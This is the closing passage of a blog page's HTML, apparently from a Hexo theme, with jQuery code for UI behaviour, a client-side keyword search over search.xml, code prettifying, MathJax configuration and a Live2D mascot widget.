            $('.table-of-contents-link').css('border-left-color', color);

            // 针对移动端做的优化：FAB按钮点击一下收回
            if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
                $('.fixed-action-btn').addClass('click-to-toggle');
            }
            // 回到顶部
            $('.btn-return-top').click(function() {
                $('body, html').animate({
                    scrollTop: 0
                }, 500);
            });

            // 重置读书页面的Tab标签页的颜色
            $('li.tab a').hover(function() {
                $(this).toggleClass('text-lighten-4');
            });
            $('.indicator').addClass('pink lighten-2');

            
            // 添加new标签
            $('').append('<span class="new badge pink"></span>');
            

            // 搜索功能
            $('.modal-trigger').leanModal({
                // 打开搜索框时自动聚焦
                ready: function() {
                    if ($('#search').is(":visible")) {
                        $('#search-input').focus();
                    }
                }
            });
            var searchXml = "";
            if (searchXml.length == 0) {
             	searchXml = "search.xml";
            }
            var searchPath = "/" + searchXml;
            initSearch(searchPath, 'search-input', 'search-result');
        });

        // 初始化搜索与匹配函数
        var initSearch = function(path, search_id, content_id) {
            'use strict';
            $.ajax({
                url: path,
                dataType: "xml",
                success: function(xmlResponse) {
                    // get the contents from search data
                    var datas = $("entry", xmlResponse).map(function() {
                        return {
                            title: $("title", this).text(),
                            content: $("content", this).text(),
                            url: $("url", this).text()
                        };
                    }).get();
                    var $input = document.getElementById(search_id);
                    var $resultContent = document.getElementById(content_id);
                    $input.addEventListener('input', function() {
                        var str = '<ul class=\"search-result-list\">';
                        var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                        $resultContent.innerHTML = "";
                        if (this.value.trim().length <= 0) {
                            return;
                        }
                        // perform local searching
                        datas.forEach(function(data) {
                            var isMatch = true;
                            var content_index = [];
                            var data_title = data.title.trim().toLowerCase();
                            var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                            var data_url = data.url;
                            var index_title = -1;
                            var index_content = -1;
                            var first_occur = -1;
                            // only match artiles with not empty titles and contents
                            if (data_title != '' && data_content != '') {
                                keywords.forEach(function(keyword, i) {
                                    index_title = data_title.indexOf(keyword);
                                    index_content = data_content.indexOf(keyword);
                                    if (index_title < 0 && index_content < 0) {
                                        isMatch = false;
                                    } else {
                                        if (index_content < 0) {
                                            index_content = 0;
                                        }
                                        if (i == 0) {
                                            first_occur = index_content;
                                        }
                                    }
                                });
                            }
                            // show search results
                            if (isMatch) {
                                keywords.forEach(function(keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    data_title = data_title.replace(regS, "<span class=\"search-keyword pink lighten-2\">" + keyword + "</span>");
                                });

                                str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                                var content = data.content.trim().replace(/<[^>]+>/g, "");
                                if (first_occur >= 0) {
                                    // cut out 100 characters
                                    var start = first_occur - 20;
                                    var end = first_occur + 80;
                                    if (start < 0) {
                                        start = 0;
                                    }
                                    if (start == 0) {
                                        end = 100;
                                    }
                                    if (end > content.length) {
                                        end = content.length;
                                    }
                                    var match_content = content.substring(start, end);
                                    // highlight all keywords
                                    keywords.forEach(function(keyword) {
                                        var regS = new RegExp(keyword, "gi");
                                        match_content = match_content.replace(regS, "<span class=\"search-keyword pink lighten-2\">" + keyword + "</span>");
                                    });

                                    str += "<p class=\"search-result\">..." + match_content + "...</p>"
                                }
                                str += "</li>";
                            }
                        });
                        str += "</ul>";
                        $resultContent.innerHTML = str;
                    });
                }
            });
        }
    })(jQuery);
</script>


<script src="/js/prettify.js"></script>
<script type="text/javascript">
    $(document).ready(function() {
        $("pre").addClass("prettyprint");
        prettyPrint();
    });
</script>






<script type="text/x-mathjax-config">
MathJax.Hub.Config({
  tex2jax: {inlineMath: [['$','$'], ['\\(','\\)']]}
});
</script>
<script type="text/javascript" async
  src="//cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-MML-AM_CHTML">
</script>



<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"model":{"scale":1,"hHeadPos":0.5,"vHeadPos":0.618,"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"superSample":2,"width":250,"height":500,"position":"left","hOffset":0,"vOffset":-100},"mobile":{"show":true,"scale":0.5},"react":{"opacityDefault":0.7,"opacityOnHover":0.2},"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
